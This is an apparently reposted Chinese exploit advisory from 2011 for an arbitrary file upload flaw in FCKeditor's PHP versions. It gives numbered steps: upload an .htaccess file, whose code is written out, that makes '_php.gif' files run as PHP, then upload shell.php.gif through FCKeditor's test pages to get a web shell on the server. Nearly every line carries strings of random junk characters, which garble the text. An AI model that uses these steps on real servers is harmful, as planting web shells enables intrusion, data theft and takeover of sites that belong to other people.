FCKeditor所有php版本Upload上传漏洞& `5 G8 `3 p [- j) q4 q+ g
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
. W, ?; ]# e ^$ \减小字体 增大字体
J* P j! U w8 i[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
) g" o2 a+ }! A% E' V[+] Date: 2011
" F8 q- ]5 L3 Y q( M& q3 O[+] Author : sinesafe.cn$ w. A: d( J/ ?0 I/ K& ]2 h. W. T
[+] Website : WwW.sinesafe.cn
# ^, G( O* g+ j# ]1 }8 `0 y———————————————————; v& Z. ?- C, |4 v z
1.create a htaccess file:7 G* _, V- ^2 \- s
code:4 _2 d7 T% c( i( f: u: T! W9 f0 k
<FilesMatch “_php.gif”>, o- z5 v8 E/ C( F! m* f
SetHandler application/x-httpd-php
4 P( [5 R1 Z. z- |- O7 Q1 Q, L</FilesMatch>
/ Z' i, Z% p0 d6 i) M2 U
4 S/ B0 d. L& a9 l. Z }% e2.Now upload this htaccess with FCKeditor.! ?+ O, c: v- J
( Z/ x5 K. \/ Qhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html6 f7 m O: P' T* R9 d
# D# h" U, S6 `: S9 K; Vhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html; h& H* D4 \' b" p3 N+ C; ?
( A- I; |3 n Y: G, r" s5 X5 t* n( H———————————————————————————————-
* {: v: P' G4 |1 e; a# a3.Now upload shell.php.gif with FCKeditor.& w+ d1 ^: P( z
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.4 a$ i) e: t+ v v
5.http://www.sinesafe.cn/anything/shell_php.gif
" x+ N9 \! f5 \0 ?7 O* w5 u: t6.Now shell is available from server. | 9 H' e ~2 W: M
5 \6 [) {$ A1 B( U6 s
8 ^4 ~1 \- J3 w4 ~! d
|